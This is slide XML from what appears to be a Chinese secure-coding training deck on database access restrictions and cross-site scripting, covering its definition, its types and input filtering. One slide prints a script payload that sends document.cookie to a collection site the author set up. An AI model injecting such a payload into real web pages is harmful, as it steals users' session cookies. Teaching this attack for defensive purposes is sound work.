              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>拒绝用户访问敏感的系统存储过程；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-355600" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>限制用户所能够访问的数据库表；</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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13341" y="1700808"/>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94802"/>
            <a:ext cx="6624637" cy="652486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逻辑缺陷： 后台认证绕过漏洞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口令管理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未释放资源</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弱加密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7538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>跨站脚本漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(XSS) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1071563"/>
            <a:ext cx="8229600" cy="564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定义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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它指的是恶意攻击者往</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>页面里插入恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>代码，当用户浏览该页之时，嵌入其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>里面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>代码会被执行，从而达到恶意用户的特殊目的。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>属于被动式的攻击，因为其被动且不好利用，所以许多人常忽略其危害性。</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dirty="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="矩形 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="615554" y="3034397"/>
            <a:ext cx="7358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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>本质是在于执行脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>等</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，攻击者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>能力越强攻击效果越惊人！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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617538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>两种类型总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="255588" y="1196975"/>
            <a:ext cx="8634412"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711200" indent="-347980" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>包括两种类型：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="711200" indent="-347980" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="711200" indent="-347980" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>持久式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：恶意代码持久保存在服务器上。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="711200" indent="-347980" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：恶意代码不保留在服务器上，而是通过其他形式实时通过服务器反射给普通用户。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="711200" indent="-347980" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="711200" indent="-347980" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>漏洞可利用的标志就是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Hello!”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，一旦示意代码可以在用户的浏览器中执行，其后可实现的攻击行为与来源是持久还是反射无关。可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>发起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击或盗取用户身份。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="711200" indent="-347980" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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7" y="225535"/>
            <a:ext cx="7174557" cy="521022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>跨站脚本漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(XSS) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="156045" y="1124744"/>
            <a:ext cx="8229600" cy="4984030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="85725" tIns="42863" rIns="85725" bIns="42863"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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2"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dirty="0"/>
              <a:t>规范要求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>用户输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>进行严格过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>【代码示例】</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>我们直接输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>xxx?param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>=”+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>)&lt;/script&gt;,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>当用户查看这个页面的时候，就会请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>www.jwdstef.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>这个站点，这个站点是我自己搭建的专门用来收集用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>的，这样我就盗取了用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="表格 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1174501" y="2708920"/>
          <a:ext cx="6192688" cy="2133600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6192688"/>
              </a:tblGrid>
              <a:tr h="327273">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;%@ page language="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>java"contentType</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>="text/html; charset=UTF-8"pageEncoding="UTF-8"%&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
